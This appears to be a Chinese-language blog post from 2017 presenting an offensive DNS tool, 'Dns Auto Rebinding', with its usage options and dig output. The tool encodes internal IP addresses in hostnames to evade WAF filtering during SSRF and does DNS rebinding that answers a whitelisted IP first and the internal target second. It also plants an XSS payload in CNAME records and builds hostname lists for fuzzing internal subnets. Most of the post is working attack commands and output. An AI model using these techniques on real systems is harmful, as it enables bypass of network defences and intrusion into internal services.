Dns Auto Rebinding

25 Jun 2017 - Tr3jer_CongRong

      ssrf时难免会被防火墙拦截恶意返回值,使用过xip.io但效果一般。项目地址: Github

      ssrf、ssrf内网地址fuzz、dns二次rebinding、支持ipv4/ipv6、支持ip地址转换码、dns记录污染(文末一个0day为例)。脑图在脑子里,懒得画了。

support Record Type and Encoding:

MX = ipv4/ipv6/hex
A = ipv4/en/int/hex
AAAA = ipv6/int/hex
CNAME = ipv4/ipv6/hex

配置监听服务器example.com:

record type record record value
A ns server ip
NS test ns.example.com

sudo pip install ipaddr

修改lib/config.conf: maindomain = test.example.com. 注意根地址.要加

Usage: sudo python main.py {Options}

Options:
  -h, --help            show this help message and exit
  -t 300, --TTL=300     ttl value , 0 By Default
  -y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX
                        Record Type , A By Default
  -e int/hex/en, --Encoding=int/hex/en
                        Record Encoding , None By Default
  -r, --Rebinding       The Second Time Query Return Target Ip
  -p "<script>alert(/xss/)</script>", --payload="<script>alert(/xss/)</script>"
                        Specified Record , Support CNAME/MX

-y选项指定以什么记录类型返回:

-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default

-t选项指定TTL值:

-t 300, --TTL=300 ttl value , 0 By Default

直接A记录返回ipv4地址:

sudo ./main.py

➜  ~ dig 192.168.1.1.test.example.com

; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50359
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.1.1.test.example.com.	IN	A

;; ANSWER SECTION:
192.168.1.1.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		227	IN	NS	ns.example.com.

server: [21:54:16] client ip:44486 => A => 192.168.1.1.test.example.com.

hex编码:

sudo ./main.py -e hex

➜  ~ dig 31302e302e302e31.test.example.com

; <<>> DiG 9.8.3-P1 <<>> 31302e302e302e31.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;31302e302e302e31.test.example.com.	IN	A

;; ANSWER SECTION:
31302e302e302e31.test.example.com. 0 IN	A	10.0.0.1

;; AUTHORITY SECTION:
test.example.com.		600	IN	NS	ns.example.com.

server: [22:00:42] client ip:30150 => A => 31302e302e302e31.test.example.com.

int编码:

sudo ./main.py -e int

➜  ~ dig 3232235777.test.example.com

; <<>> DiG 9.8.3-P1 <<>> 3232235777.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18066
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;3232235777.test.example.com.	IN	A

;; ANSWER SECTION:
3232235777.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		456	IN	NS	ns.example.com.

server: [22:03:00] client ip:5240 => A => 3232235777.test.example.com.

      因为waf会识别出内网地址才用的上本项目,那么waf大可识别进制转换这种,所以要自己写个地址转换方法:

num to en:

./lib/common.py 192.168.1.1

1. Single IP Covert For En
2. Build IP List
[+] [1 By Default/2]
bjckbgikbkb

sudo ./main.py -e en

➜  ~ dig bjckbgikbkb.test.example.com

; <<>> DiG 9.8.3-P1 <<>> bjckbgikbkb.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5115
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;bjckbgikbkb.test.example.com.	IN	A

;; ANSWER SECTION:
bjckbgikbkb.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		20	IN	NS	ns.example.com.

server: [22:10:22] client ip:8434 => A => bjckbgikbkb.test.example.com.

dns二次rebinding:

sudo ./main.py -r
Input Safe Ip? [Address/Req By Default]8.8.8.8

      选择性输入目标信任的地址,比如在ssrf时防火墙在验证dns返回值是否存在于白名单。默认为发起请求的地址。(记得特殊情况需要指定记录类型)

第一次:

➜  ~ dig 192.168.1.1.test.example.com

; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59544
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.1.1.test.example.com.	IN	A

;; ANSWER SECTION:
192.168.1.1.test.example.com. 0	IN	A	8.8.8.8

;; AUTHORITY SECTION:
test.example.com.		461	IN	NS	ns.example.com.

第二次:

➜  ~ dig 192.168.1.1.test.example.com

; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45312
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.1.1.test.example.com.	IN	A

;; ANSWER SECTION:
192.168.1.1.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		501	IN	NS	ns.example.com.

dns记录污染:

sudo ./main.py -p "<script>alert(/xss/)</script>" -y CNAME

➜  ~ dig test.example.com

; <<>> DiG 9.8.3-P1 <<>> test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5073
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;test.example.com.			IN	A

;; ANSWER SECTION:
test.example.com.		0	IN	CNAME	<script>alert\(/xss/\)</script>test.example.com.

      这个怎么玩取决于你的小脑袋瓜的脑回路了。如果防火墙还要验证是否为信任地址的话修改lib/common.py:

elif payload != 'None' and payload.find(mainDomain) == -1:
    record = payload + "信任地址."

ipListBuild: 批量生成网段地址,选择性编码,适合ssrf内网地址fuzz。

python lib/common.py 192.168.1.1

1. Single IP Covert For En
2. Build IP List
[+] [1 By Default/2]2
[+] Please Input Segment Length [24 By Default]
[+] Please Input Encoding ['ipv4' By Default]hex
[+] Please Input Server Root Address [test.example.com By Default]
[+] Stored in the 20170625223912_test_example_com_hex.txt
[root@VM_34_252_centos dnsAutoRebinding]# head -n 5 20170625223912_test_example_com_hex.txt
3139322e3136382e312e31.test.example.com
3139322e3136382e312e32.test.example.com
3139322e3136382e312e33.test.example.com
3139322e3136382e312e34.test.example.com
3139322e3136382e312e35.test.example.com